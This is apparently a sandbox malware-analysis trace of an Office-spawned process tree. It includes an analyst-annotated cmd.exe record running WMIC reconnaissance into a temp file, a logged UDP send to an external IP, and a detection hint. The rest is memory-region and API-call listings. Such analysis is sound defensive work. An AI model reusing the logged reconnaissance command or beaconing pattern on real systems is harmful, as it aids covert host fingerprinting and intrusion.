[0416.065] socket (af=2, type=2, protocol=17) returned 0x268
[0416.078] htons (hostshort=0xe061) returned 0x61e0
[0416.078] inet_addr (cp="186.48.86.162") returned 0xa25630ba
[0416.079] setsockopt (s=0x268, level=65535, optname=4102, optval="ÀÔ\x01", optlen=8) returned 0
[0416.079] sendto (s=0x268, buf=0x24cec3f*, len=96, flags=0, to=0x24cec2c*(sa_family=2, sin_port=0xe061, sin_addr="186.48.86.162"), tolen=16) returned 96
[0416.146] recvfrom (s=0x268, buf=0x24ceb53, len=201, flags=0, from=0x24cec2c, fromlen=0x24cec28)
Thread:
id = 114
os_tid = 0xdcc
Thread:
id = 115
os_tid = 0xd6c
# Process record for a child cmd.exe (monitor_reason = child_process, parent_id = 17).
# Its command line runs WMIC to read the creation date of wininit.exe and redirects
# the output, piped through "more", into %TEMP%\~dr9078.
# wininit.exe is started during boot, so its creation date approximates the system
# boot time. NOTE(review): why the sample wants that value (host fingerprinting,
# an uptime check, ...) is not shown in this excerpt - confirm in the parent's trace.
# Token context: os_integrity_level 0x2000 is the medium integrity level, and
# BUILTIN\Administrators carries attribute 0x10 (SE_GROUP_USE_FOR_DENY_ONLY), so the
# command runs with a non-elevated token.
# Related events visible in this log:
#   - the thread traced below (id 116) resolves "WMIC" through the PATH search to
#     C:\Windows\System32\Wbem\WMIC.EXE;
#   - a thread traced just before this record calls DeleteFileW on the same ~dr9078
#     path at [0415.633] (returned 0, the value DeleteFileW uses for failure) and
#     then sends a 96-byte UDP datagram to 186.48.86.162 with sendto. The process
#     that owns that thread is outside this excerpt.
# Detection: in process-creation telemetry, look for cmd.exe /c running WMIC PROCESS
# queries with output redirected into %TEMP%, especially when the process tree
# leads back to an Office application (this log's analysis target is excel.exe).
Process:
id = "18"
image_name = "cmd.exe"
filename = "c:\\windows\\system32\\cmd.exe"
page_root = "0x22c6c000"
os_pid = "0xdd4"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "17"
os_parent_pid = "0x424"
cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c WMIC PROCESS where name=\"wininit.exe\" get creationdate |more > %TEMP%\\~dr9078"
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 2383
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 2384
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 2385
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 2386
start_va = 0x130000
end_va = 0x22ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000130000"
filename = ""
Region:
id = 2387
start_va = 0x4a630000
end_va = 0x4a688fff
monitored = 1
entry_point = 0x4a6390b4
region_type = mapped_file
name = "cmd.exe"
filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")
Region:
id = 2388
start_va = 0x77880000
end_va = 0x77a28fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2389
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 2390
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 2391
start_va = 0x7feffba0000
end_va = 0x7feffba0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 2392
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 2393
start_va = 0x7fffffd8000
end_va = 0x7fffffd8fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd8000"
filename = ""
Region:
id = 2394
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 2395
start_va = 0x230000
end_va = 0x4affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000230000"
filename = ""
Region:
id = 2396
start_va = 0x77660000
end_va = 0x7777efff
monitored = 0
entry_point = 0x77675340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2397
start_va = 0x7fefd920000
end_va = 0x7fefd98bfff
monitored = 0
entry_point = 0x7fefd922780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2398
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2399
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 2400
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 2401
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 2402
start_va = 0x50000
end_va = 0xb6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2403
start_va = 0x7feff7d0000
end_va = 0x7feff86efff
monitored = 0
entry_point = 0x7feff7d25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2404
start_va = 0x7fefb8b0000
end_va = 0x7fefb8b7fff
monitored = 0
entry_point = 0x7fefb8b11a0
region_type = mapped_file
name = "winbrand.dll"
filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll")
Region:
id = 2405
start_va = 0x77780000
end_va = 0x77879fff
monitored = 0
entry_point = 0x7779a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2406
start_va = 0x7feff980000
end_va = 0x7feff9e6fff
monitored = 0
entry_point = 0x7feff98b03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2407
start_va = 0x7fefef80000
end_va = 0x7fefef8dfff
monitored = 0
entry_point = 0x7fefef81080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 2408
start_va = 0x7fefe120000
end_va = 0x7fefe1e8fff
monitored = 0
entry_point = 0x7fefe19a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 2409
start_va = 0x230000
end_va = 0x2affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000230000"
filename = ""
Region:
id = 2410
start_va = 0x3b0000
end_va = 0x4affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003b0000"
filename = ""
Region:
id = 2411
start_va = 0x2b0000
end_va = 0x3affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002b0000"
filename = ""
Region:
id = 2412
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2413
start_va = 0x4b0000
end_va = 0x637fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000004b0000"
filename = ""
Region:
id = 2414
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2415
start_va = 0x7feff950000
end_va = 0x7feff97dfff
monitored = 0
entry_point = 0x7feff951010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2416
start_va = 0x7feff3d0000
end_va = 0x7feff4d8fff
monitored = 0
entry_point = 0x7feff3d1064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 2417
start_va = 0x640000
end_va = 0x7c0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000640000"
filename = ""
Region:
id = 2418
start_va = 0x7d0000
end_va = 0x1bcffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007d0000"
filename = ""
Region:
id = 2419
start_va = 0xc0000
end_va = 0xdffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cmd.exe.mui"
filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui")
Region:
id = 2420
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000e0000"
filename = ""
Region:
id = 2421
start_va = 0xf0000
end_va = 0xf0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 2422
start_va = 0x1bd0000
end_va = 0x1e9efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Thread:
id = 116
os_tid = 0xdd8
[0399.962] GetProcAddress (hModule=0x77660000, lpProcName="SetConsoleInputExeNameW") returned 0x77670c80
[0399.963] GetProcessHeap () returned 0x3b0000
[0399.963] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x4012) returned 0x3cb010
[0399.963] GetProcessHeap () returned 0x3b0000
[0399.963] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x4010) returned 0x3cf030
[0399.964] GetProcessHeap () returned 0x3b0000
[0399.964] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x1a) returned 0x3c4780
[0399.964] GetEnvironmentVariableW (in: lpName="TEMP", lpBuffer=0x4a65f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0399.964] GetProcessHeap () returned 0x3b0000
[0399.964] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3c4780 | out: hHeap=0x3b0000) returned 1
[0399.964] GetProcessHeap () returned 0x3b0000
[0399.964] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3cf030 | out: hHeap=0x3b0000) returned 1
[0399.964] GetProcessHeap () returned 0x3b0000
[0399.964] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3cb010 | out: hHeap=0x3b0000) returned 1
[0399.966] _wcsicmp (_String1="WMIC", _String2=")") returned 78
[0399.966] _wcsicmp (_String1="FOR", _String2="WMIC") returned -17
[0399.966] _wcsicmp (_String1="FOR/?", _String2="WMIC") returned -17
[0399.966] _wcsicmp (_String1="IF", _String2="WMIC") returned -14
[0399.966] _wcsicmp (_String1="IF/?", _String2="WMIC") returned -14
[0399.966] _wcsicmp (_String1="REM", _String2="WMIC") returned -5
[0399.966] _wcsicmp (_String1="REM/?", _String2="WMIC") returned -5
[0399.966] GetProcessHeap () returned 0x3b0000
[0399.966] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xb0) returned 0x3c9e80
[0399.967] GetProcessHeap () returned 0x3b0000
[0399.967] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x1a) returned 0x3c4780
[0399.969] GetProcessHeap () returned 0x3b0000
[0399.969] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x78) returned 0x3c9f40
[0399.970] GetProcessHeap () returned 0x3b0000
[0399.970] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xb0) returned 0x3c9fc0
[0399.971] _wcsicmp (_String1="FOR", _String2="more") returned -7
[0399.971] _wcsicmp (_String1="FOR/?", _String2="more") returned -7
[0399.971] _wcsicmp (_String1="IF", _String2="more") returned -4
[0399.971] _wcsicmp (_String1="IF/?", _String2="more") returned -4
[0399.971] _wcsicmp (_String1="REM", _String2="more") returned 5
[0399.972] _wcsicmp (_String1="REM/?", _String2="more") returned 5
[0399.972] GetProcessHeap () returned 0x3b0000
[0399.972] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xb0) returned 0x3ca080
[0399.972] GetProcessHeap () returned 0x3b0000
[0399.972] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x1a) returned 0x3c47b0
[0399.972] GetProcessHeap () returned 0x3b0000
[0399.972] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x14) returned 0x3c8640
[0399.972] GetProcessHeap () returned 0x3b0000
[0399.972] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x38) returned 0x3c67d0
[0399.981] GetProcessHeap () returned 0x3b0000
[0399.981] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x6a) returned 0x3ca140
[0399.983] GetProcessHeap () returned 0x3b0000
[0399.984] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x48) returned 0x3ca1c0
[0399.984] _pipe (in: _PtHandles=0x3ca1d0, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0x3ca1d0) returned 0
[0399.984] _dup (_FileHandle=1) returned 5
[0399.985] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0
[0399.986] _close (_FileHandle=4) returned 0
[0399.987] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19
[0399.987] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18
[0399.987] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19
[0399.987] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3
[0399.987] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20
[0399.987] _wcsicmp (_String1="WMIC", _String2="CD") returned 20
[0399.987] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20
[0399.987] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5
[0399.987] _wcsicmp (_String1="WMIC", _String2="REN") returned 5
[0399.988] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18
[0399.988] _wcsicmp (_String1="WMIC", _String2="SET") returned 4
[0399.988] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7
[0399.988] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19
[0399.988] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3
[0399.988] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7
[0399.988] _wcsicmp (_String1="WMIC", _String2="MD") returned 10
[0399.988] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10
[0399.988] _wcsicmp (_String1="WMIC", _String2="RD") returned 5
[0399.988] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5
[0399.988] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7
[0399.988] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16
[0399.988] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4
[0399.988] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20
[0399.988] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20
[0399.988] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1
[0399.988] _wcsicmp (_String1="WMIC", _String2="VER") returned 1
[0399.989] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1
[0399.989] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18
[0399.989] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4
[0399.989] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18
[0399.989] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3
[0399.989] _wcsicmp (_String1="WMIC", _String2="START") returned 4
[0399.989] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19
[0399.989] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12
[0399.989] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10
[0399.989] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7
[0399.989] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7
[0399.989] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22
[0399.989] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17
[0399.989] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21
[0399.989] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20
[0399.989] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10
[0399.989] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19
[0399.990] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18
[0399.990] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19
[0399.990] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3
[0399.990] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20
[0399.990] _wcsicmp (_String1="WMIC", _String2="CD") returned 20
[0399.990] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20
[0399.990] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5
[0399.990] _wcsicmp (_String1="WMIC", _String2="REN") returned 5
[0399.990] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18
[0399.990] _wcsicmp (_String1="WMIC", _String2="SET") returned 4
[0399.990] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7
[0399.990] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19
[0399.990] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3
[0399.990] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7
[0399.990] _wcsicmp (_String1="WMIC", _String2="MD") returned 10
[0399.990] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10
[0399.991] _wcsicmp (_String1="WMIC", _String2="RD") returned 5
[0399.991] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5
[0399.991] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7
[0399.991] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16
[0399.991] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4
[0399.991] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20
[0399.991] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20
[0399.991] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1
[0399.991] _wcsicmp (_String1="WMIC", _String2="VER") returned 1
[0399.991] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1
[0399.991] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18
[0399.991] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4
[0399.991] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18
[0399.991] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3
[0399.991] _wcsicmp (_String1="WMIC", _String2="START") returned 4
[0399.991] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19
[0399.992] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12
[0399.992] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10
[0399.992] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7
[0399.992] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7
[0399.992] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22
[0399.992] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17
[0399.992] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21
[0399.992] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20
[0399.992] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10
[0399.992] _wcsicmp (_String1="WMIC", _String2="FOR") returned 17
[0399.992] _wcsicmp (_String1="WMIC", _String2="IF") returned 14
[0399.992] _wcsicmp (_String1="WMIC", _String2="REM") returned 5
[0399.993] GetProcessHeap () returned 0x3b0000
[0399.993] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x4010) returned 0x3cb010
[0399.993] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19
[0399.993] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18
[0399.993] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19
[0399.993] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3
[0399.993] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20
[0399.993] _wcsicmp (_String1="WMIC", _String2="CD") returned 20
[0399.993] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20
[0399.993] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5
[0399.993] _wcsicmp (_String1="WMIC", _String2="REN") returned 5
[0399.993] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18
[0399.993] _wcsicmp (_String1="WMIC", _String2="SET") returned 4
[0399.994] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7
[0399.994] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19
[0399.994] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3
[0399.994] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7
[0399.994] _wcsicmp (_String1="WMIC", _String2="MD") returned 10
[0399.994] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10
[0399.994] _wcsicmp (_String1="WMIC", _String2="RD") returned 5
[0399.994] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5
[0399.994] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7
[0399.994] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16
[0399.994] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4
[0399.994] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20
[0399.994] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20
[0399.994] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1
[0399.994] _wcsicmp (_String1="WMIC", _String2="VER") returned 1
[0399.994] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1
[0399.995] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18
[0399.995] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4
[0399.995] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18
[0399.995] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3
[0399.995] _wcsicmp (_String1="WMIC", _String2="START") returned 4
[0399.995] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19
[0399.995] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12
[0399.995] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10
[0399.995] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7
[0399.995] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7
[0399.995] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22
[0399.995] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17
[0399.995] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21
[0399.995] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20
[0399.995] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10
[0399.996] _wcsnicmp (_String1="WMIC", _String2="cmd ", _MaxCount=0x4) returned 20
[0399.996] GetProcessHeap () returned 0x3b0000
[0399.996] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x420) returned 0x3cf030
[0399.996] SetErrorMode (uMode=0x0) returned 0x0
[0399.996] SetErrorMode (uMode=0x1) returned 0x0
[0399.997] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3cf040, lpFilePart=0x22f7d0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x22f7d0*="system32") returned 0x13
[0399.997] SetErrorMode (uMode=0x0) returned 0x1
[0399.997] GetProcessHeap () returned 0x3b0000
[0399.997] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3cf030, Size=0x42) returned 0x3cf030
[0399.997] GetProcessHeap () returned 0x3b0000
[0399.997] RtlSizeHeap (HeapHandle=0x3b0000, Flags=0x0, MemoryPointer=0x3cf030) returned 0x42
[0399.997] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a65f360, nSize=0x2000 | out: lpBuffer="") returned 0xc8
[0399.997] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
[0399.998] GetProcessHeap () returned 0x3b0000
[0399.998] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x1ce) returned 0x3ca210
[0399.998] GetProcessHeap () returned 0x3b0000
[0399.998] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x38c) returned 0x3cf090
[0400.019] GetProcessHeap () returned 0x3b0000
[0400.019] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3cf090, Size=0x1d0) returned 0x3cf090
[0400.019] GetProcessHeap () returned 0x3b0000
[0400.019] RtlSizeHeap (HeapHandle=0x3b0000, Flags=0x0, MemoryPointer=0x3cf090) returned 0x1d0
[0400.019] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a65f360, nSize=0x2000 | out: lpBuffer="") returned 0x35
[0400.019] GetProcessHeap () returned 0x3b0000
[0400.019] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xe8) returned 0x3cf270
[0400.019] GetProcessHeap () returned 0x3b0000
[0400.019] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3cf270, Size=0x7e) returned 0x3cf270
[0400.019] GetProcessHeap () returned 0x3b0000
[0400.019] RtlSizeHeap (HeapHandle=0x3b0000, Flags=0x0, MemoryPointer=0x3cf270) returned 0x7e
[0400.021] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0400.022] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC.*" (normalized: "c:\\windows\\system32\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x22f540, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f540) returned 0xffffffffffffffff
[0400.022] GetLastError () returned 0x2
[0400.022] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC" (normalized: "c:\\windows\\system32\\wmic"), fInfoLevelId=0x1, lpFindFileData=0x22f540, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f540) returned 0xffffffffffffffff
[0400.022] GetLastError () returned 0x2
[0400.022] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0400.023] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\WMIC.*" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x22f540, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f540) returned 0xffffffffffffffff
[0400.027] GetLastError () returned 0x2
[0400.027] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\WMIC" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\wmic"), fInfoLevelId=0x1, lpFindFileData=0x22f540, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f540) returned 0xffffffffffffffff
[0400.027] GetLastError () returned 0x2
[0400.028] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0400.028] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC.*" (normalized: "c:\\windows\\system32\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x22f540, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f540) returned 0xffffffffffffffff
[0400.028] GetLastError () returned 0x2
